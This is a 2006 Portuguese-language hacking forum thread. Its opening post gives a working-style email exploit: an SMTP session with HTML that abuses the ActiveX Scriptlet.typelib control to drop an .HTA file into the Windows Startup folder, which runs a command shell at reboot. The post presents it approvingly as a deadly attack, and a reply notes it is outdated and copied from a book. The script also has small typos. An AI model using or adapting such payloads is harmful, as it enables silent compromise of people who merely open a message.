Ataque de email

Started by _Dr4k0_, 27 de July , 2006, 06:16:20 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

_Dr4k0_

27 de July , 2006, 06:16:20 PM
Outros ataques de email nao sao tao mortais quanto este: tudo o que a vitima precisa fazer é ler a mensagem. Esse maravilhoso poder destruidor é trazido novamente para voce por meio do controle Activex Scriptlet.typelib, que é marcado como "seguro para execucao de scripts". abaixo um exemplo de seu uso:

Code Select
helo algumdominio.com
mail from: <atacante@email.net>
rcpt to: <vitima@email.net>
data
subject: Leia isto sem falta !
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Se tiver recebido esta mensagem por engano, exclua-a.
<object id="scr" classid="clsid:06290bd5-48AA-11D2-8432-006008C3FBFC">
</object>
</SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Menu Iniciar\\Programas\\Iniciar\\acidmud.hta";
scr.Doc="object id='wsh' classid='clsid:F935DC22-1CF0-11DO-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Escrito por AciDmuD');wsh.Run('c:\\windows\\commando.com');</"+"script>";
scr.write();
</SCRIPT>
</object>
.
quit
este codigo executa o ataque em duas etapas. primeiro, ele cria um arquivo de aplicativo HTML(extensao .HTA) na pasta iniciar do usuario e grava a carga util do script nele. A cricao do arquivo ocorre silenciosamente e quase sempre sem que o usuario se dê conta, assim que ele visualiza a mensagem(talvez ele perceba uma atividade no disco rigido por meio do led no painel frontal do computador).

a segunda etapa o ocorre quando o usuario inevitavelmente reinicia a maquina. o arquivo .HTA é executado na inicializacao(arquivos .HTA sao automaticamente interpretados pelo shell do windows). nesse exemplo a vitima é contemplada com uma mensagem ! esta é apenas uma acao inofensiva para fins demonstrativo !

Abraços.

Créditos :AciDmuD
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

HadeS

#1
28 de July , 2006, 12:42:29 AM
Esse code não foi feito pelo AciDmuD (Se é que isso é uma pessoa). Eu tinha um code desse, ainda mais poderoso, porém muito parecido, feito pelo Guninsk (acho que é assim que escreve).

E uma coisa, não funciona mais. Essa técnica é descrita no Hackers Expostos 2ª Edição.

HadeS

_Dr4k0_

#2
28 de July , 2006, 10:31:28 AM
Quote from: "HadeS"Esse code não foi feito pelo AciDmuD (Se é que isso é uma pessoa). Eu tinha um code desse, ainda mais poderoso, porém muito parecido, feito pelo Guninsk (acho que é assim que escreve).

E uma coisa, não funciona mais. Essa técnica é descrita no Hackers Expostos 2ª Edição.

HadeS

Eu não estou querendo roubar créditos de ninguem é pq ele postou no www.hackmode.tk assim ai do jeito que ele deixou lá eu trouxe para cah...
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

HadeS

#3
28 de July , 2006, 02:54:33 PM
Não estou falando de você, e sim dele. ;)

HadeS
Print
Go Up Pages1
User actions